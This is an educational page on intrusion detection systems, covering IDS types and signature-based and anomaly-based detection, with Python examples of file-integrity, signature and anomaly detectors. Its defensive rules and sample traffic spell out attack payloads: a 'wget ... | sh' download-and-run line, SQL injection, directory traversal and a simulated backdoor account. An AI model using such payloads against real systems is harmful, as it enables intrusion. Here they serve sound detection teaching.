An Intrusion Detection System

Uploaded by kalpanaapj

An Intrusion Detection System (IDS) is a monitoring system that detects suspicious activities and generates alerts when they are detected.


An intrusion detection system (IDS) is software, or a dedicated appliance,
that observes network traffic or host activity for malicious behaviour and
policy violations and raises an alert as soon as something suspicious is
seen. Each detected violation is typically recorded centrally in a SIEM
system or reported to an administrator. A classic IDS only detects and
reports; blocking traffic is the job of a firewall or an intrusion
prevention system (IPS). It is commonly deployed to spot unauthorized
access attempts, including those made by insiders.

How does an IDS work?

- An IDS (Intrusion Detection System) monitors the traffic on a computer
network, or the activity on a host, to detect suspicious behaviour.
- It analyses the data flowing through the network to look for patterns and
signs of abnormal behaviour.
- The IDS compares the observed activity to a set of predefined rules and
patterns to identify anything that might indicate an attack or intrusion.
- If the IDS detects something that matches one of these rules or patterns, it
raises an alert for the system administrator or the security operations team.
- The administrator can then investigate the alert and take action to
contain the damage or prevent further intrusion.

Classification of Intrusion Detection System


IDSs are commonly classified into five types:

- Network Intrusion Detection System (NIDS): A NIDS is deployed at a
chosen point in the network (typically fed by a mirror port or a network
tap) where it can see the traffic of all devices on that segment. It
inspects the passing traffic on the whole subnet and matches it against a
collection of known attack patterns. Once an attack is identified or
abnormal behaviour is observed, an alert is sent to the administrator. A
typical placement is on the subnet where the firewalls sit, to see whether
someone is trying to get through the firewall.

- Host Intrusion Detection System (HIDS): A HIDS runs on an individual
host or device. It monitors that device only: its incoming and outgoing
packets, its logs and processes, and its file system, and alerts the
administrator if suspicious or malicious activity is detected. A common
HIDS function is file-integrity monitoring: it takes a snapshot (a set of
cryptographic hashes) of critical system files and compares it with the
previous snapshot; if monitored files have been edited or deleted, an
alert is raised for investigation. HIDS is well suited to mission-critical
machines whose configuration is not expected to change.

- Protocol-based Intrusion Detection System (PIDS): A PIDS is a system or
agent that sits at the front end of a server and monitors and interprets
the protocol exchanged between a user or device and that server. For a web
server it inspects the HTTP stream and flags requests that violate the
protocol or look malicious. Because HTTPS is encrypted on the wire, a PIDS
cannot read that traffic from the network; it must be placed where TLS is
terminated, between the TLS endpoint and the web application, so that it
sees the decrypted HTTP.

- Application Protocol-based Intrusion Detection System (APIDS): An APIDS
is a system or agent that generally resides within a group of servers and
identifies intrusions by monitoring and interpreting the communication on
application-specific protocols. For example, it might monitor the SQL
protocol between the middleware and the database server as the web
application transacts with the database, flagging unexpected queries.

- Hybrid Intrusion Detection System: A hybrid IDS combines two or more of
the approaches above. Host agent or system data is correlated with network
information to build a more complete view of the environment, so that an
event visible only on the host (a changed file) and one visible only on
the wire (the connection that delivered it) can be tied together. Prelude
is an example of a hybrid IDS.

Organizations typically deploy a protocol-based IDS in front of the server
it protects (for a web server, at the point where TLS is terminated), where
it can interpret the protocol exchanged between the user and the server and
flag HTTP requests that violate it.
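The file-integrity check that the HIDS description above refers to, as an added example (not code from the original page or from any particular HIDS product). It hashes every file under a directory with SHA-256, keeps the result as a baseline snapshot, and classifies later changes as added, modified or deleted. The monitored files and the tampering are constructed inside a temporary directory so the script runs offline.

```python
# Added example (not from the original page): a minimal host-based
# file-integrity check of the kind a HIDS performs. It hashes every file
# under a directory, stores the result as a baseline snapshot, and reports
# files that were added, modified or deleted when a later snapshot is
# compared against the baseline.
import hashlib
import os
import tempfile


def file_digest(path, chunk_size=65536):
    """Return the SHA-256 hex digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map each regular file under root (path relative to root) to its digest."""
    result = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # skip symlinks and special files; targets are hashed via their own path
            result[os.path.relpath(full, root)] = file_digest(full)
    return result


def diff_snapshots(baseline, current):
    """Compare a later snapshot against the baseline and classify every change."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
        "modified": sorted(
            p for p in set(baseline) & set(current) if baseline[p] != current[p]
        ),
    }


def demo():
    """Constructed scenario: baseline a fake /etc tree, then tamper with it."""
    with tempfile.TemporaryDirectory() as root:
        # constructed sample files standing in for monitored system files
        sample = {
            "etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
            "etc/shadow": b"root:*:19000:0:99999:7:::\n",
            "etc/hosts": b"127.0.0.1 localhost\n",
        }
        for rel, content in sample.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as f:
                f.write(content)
        baseline = snapshot(root)

        # simulate tampering: a new uid-0 account, a dropped cron job, a deleted file
        with open(os.path.join(root, "etc/passwd"), "ab") as f:
            f.write(b"backdoor:x:0:0::/root:/bin/bash\n")
        os.makedirs(os.path.join(root, "etc/cron.d"))
        with open(os.path.join(root, "etc/cron.d/update"), "wb") as f:
            f.write(b"* * * * * root /tmp/.x\n")
        os.remove(os.path.join(root, "etc/hosts"))

        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print(f"ALERT {kind}: {p}")
```

The baseline must be stored where an attacker who has compromised the host cannot rewrite it (off-box or on read-only media); a snapshot kept next to the files it protects can be regenerated by the intruder after the change, which is also why the comparison is usually run from a separate agent rather than by the monitored system itself.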

Signature-based Intrusion Detection Method


The signature-based method examines network traffic (or host data) for
byte patterns that are known to belong to specific attacks. Each signature
is a sequence of bytes, a string or a regular expression, combined with
conditions such as protocol and port; signatures are written by analysts
or the IDS vendor from samples of a known attack and distributed as a rule
set, and the IDS compares every packet or log entry against that list.
Attacks whose signatures already exist are detected reliably and with few
false positives, but a new attack, or a known attack whose bytes have been
altered (for example by encoding or fragmentation), produces no match
until someone writes a signature for it.
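An added example (not code from the original page or from any IDS product) that ties together the monitor, analyse, compare-to-rules and alert steps from the "How does an IDS work?" list and the signature matching described in this section. Rules are Snort-style content matches on protocol, destination port and a byte pattern in the payload; the rule set, the rule identifiers and the packet records are all constructed for illustration.

```python
# Added example (not from the original page): a minimal signature-based NIDS
# that follows the monitor -> analyse -> compare-to-rules -> alert loop.
# Rules are Snort-style "content" matches (protocol, destination port, byte
# pattern in the payload). The rule set, the hypothetical rule IDs (sid) and
# the packet records are constructed for illustration.
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str
    dport: int
    payload: bytes


@dataclass(frozen=True)
class Rule:
    sid: int               # hypothetical rule identifier
    msg: str               # alert text
    proto: str             # "tcp" or "udp"
    dport: Optional[int]   # None matches any destination port
    pattern: bytes         # regex applied to the payload, case-insensitive


# Constructed rule set; a real signature database holds thousands of entries.
RULES = [
    Rule(1000001, "Web directory traversal attempt", "tcp", 80, rb"\.\./\.\./"),
    Rule(1000002, "SQL injection tautology in URI", "tcp", 80, rb"'\s*or\s+1\s*=\s*1"),
    Rule(1000003, "Shell download cradle in payload", "tcp", None, rb"wget\s+http://\S+\s*\|\s*sh"),
]


def match_rule(rule: Rule, pkt: Packet) -> bool:
    """True when every field of the rule (protocol, port, content) matches."""
    if pkt.proto != rule.proto:
        return False
    if rule.dport is not None and pkt.dport != rule.dport:
        return False
    return re.search(rule.pattern, pkt.payload, re.IGNORECASE) is not None


def inspect_traffic(packets: List[Packet], rules=RULES) -> List[dict]:
    """Compare each packet against every rule and return one alert per match."""
    alerts = []
    for pkt in packets:
        for rule in rules:
            if match_rule(rule, pkt):
                alerts.append({"sid": rule.sid, "msg": rule.msg,
                               "src": pkt.src, "dst": pkt.dst})
    return alerts


# Constructed sample traffic: one benign request, three attacks that match a
# signature, and one attack variant whose URL-encoding defeats the signature.
SAMPLE_TRAFFIC = [
    Packet("10.0.0.5", "10.0.0.80", "tcp", 80, b"GET /index.html HTTP/1.1\r\n"),
    Packet("203.0.113.7", "10.0.0.80", "tcp", 80, b"GET /../../etc/passwd HTTP/1.1\r\n"),
    Packet("203.0.113.7", "10.0.0.80", "tcp", 80, b"GET /login?u=admin' OR 1=1-- HTTP/1.1\r\n"),
    Packet("203.0.113.9", "10.0.0.22", "tcp", 22, b"wget http://203.0.113.9/x | sh\n"),
    # same traversal attack with "../" percent-encoded: no signature hit
    Packet("203.0.113.7", "10.0.0.80", "tcp", 80, b"GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1\r\n"),
]


if __name__ == "__main__":
    for alert in inspect_traffic(SAMPLE_TRAFFIC):
        print(f"[sid {alert['sid']}] {alert['msg']}: {alert['src']} -> {alert['dst']}")
```

The last packet shows the weakness the text describes: the encoded traversal is the same attack, but the bytes differ, so the rule does not fire. Production engines counter this with protocol-aware preprocessors that normalise (decode, reassemble) the stream before signatures are applied, and the rule set still has to be updated whenever a genuinely new attack appears.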
Anomaly-based Intrusion Detection Method
As noted above, the signature-based method cannot detect unknown or new
attacks. Organizations therefore add anomaly-based detection, which
identifies new and unknown suspicious activity and policy breaches that
signature matching misses. This method first builds a model of normal
activity, using statistical or machine-learning techniques, from a period
of observed traffic; it then flags observations that deviate significantly
from that model as potentially malicious. Its strength is coverage of
novel attacks; its weaknesses are a higher false-positive rate (legitimate
but unusual behaviour also deviates from the model) and the risk that
attack traffic present during the training period is learned as normal.
In practice the two methods are complementary, and most IDS products
combine them rather than relying on one alone.
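An added example (not code from the original page or from any IDS product) of the anomaly-based method described above. A simple statistical baseline stands in for the learned activity model: per-source, per-minute connection counts and the number of distinct destination ports are learned from a constructed "normal" training period, and later windows are scored by how many standard deviations they lie above the baseline. Host names, thresholds and all traffic records are constructed for illustration.

```python
# Added example (not from the original page): a minimal anomaly-based
# detector. A baseline of normal behaviour (per-source, per-minute
# connection count and distinct destination ports) is learned from a
# training period; later windows are scored by z-score against it.
# All traffic records are constructed for illustration.
import statistics
from collections import defaultdict


def window_features(records, window=60):
    """Bucket (timestamp, src, dport) records into per-source time windows and
    return {(src, window_index): (connection_count, distinct_port_count)}."""
    buckets = defaultdict(lambda: [0, set()])
    for ts, src, dport in records:
        key = (src, ts // window)
        buckets[key][0] += 1
        buckets[key][1].add(dport)
    return {k: (count, len(ports)) for k, (count, ports) in buckets.items()}


class BaselineModel:
    """Mean and standard deviation of each feature over the training windows."""

    def __init__(self, training_records, window=60):
        feats = list(window_features(training_records, window).values())
        counts = [c for c, _ in feats]
        ports = [p for _, p in feats]
        self.window = window
        # floor the deviation at 1.0 so a perfectly regular baseline does not
        # turn every tiny fluctuation into an enormous z-score
        self.count_mean = statistics.mean(counts)
        self.count_sd = max(statistics.pstdev(counts), 1.0)
        self.port_mean = statistics.mean(ports)
        self.port_sd = max(statistics.pstdev(ports), 1.0)

    def score(self, records, threshold=3.0):
        """Return (src, window, reason, z) for every window whose port spread or
        volume lies more than `threshold` standard deviations above the baseline."""
        anomalies = []
        for (src, w), (count, nports) in sorted(window_features(records, self.window).items()):
            z_count = (count - self.count_mean) / self.count_sd
            z_ports = (nports - self.port_mean) / self.port_sd
            if z_ports > threshold:
                anomalies.append((src, w, "port-spread", round(z_ports, 1)))
            elif z_count > threshold:
                anomalies.append((src, w, "volume", round(z_count, 1)))
        return anomalies


def make_training():
    """Constructed 'normal' traffic: five hosts, 30 minutes, 2-4 web
    connections per minute each, alternating between ports 80 and 443."""
    records = []
    for minute in range(30):
        for i in range(5):
            n = 2 + (minute + i) % 3
            for j in range(n):
                records.append((minute * 60 + j * 10, f"10.0.0.{i + 1}",
                                80 if j % 2 == 0 else 443))
    return records


TRAINING = make_training()

# Constructed traffic to score: one normal host, one port scan, one flood.
TEST_TRAFFIC = (
    [(6000 + j * 10, "10.0.0.1", 80 if j % 2 == 0 else 443) for j in range(3)]
    + [(6000 + p, "10.0.0.9", p) for p in range(1, 21)]      # 20 ports in a minute
    + [(6060 + j, "10.0.0.2", 80) for j in range(40)]        # 40 connections to port 80
)


def demo():
    """Train on the constructed baseline and score the constructed test traffic."""
    return BaselineModel(TRAINING).score(TEST_TRAFFIC)


if __name__ == "__main__":
    for src, w, reason, z in demo():
        print(f"ANOMALY src={src} window={w} reason={reason} z={z}")
```

The normal host produces no alert, the port scan is reported as a port-spread anomaly and the flood as a volume anomaly, without any signature for either. The same mechanism also illustrates the caveats above: raise the threshold and the scan is missed, lower it and a busy but legitimate host starts to alert, and if the scan had been present in `TRAINING` the baseline would have absorbed it.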
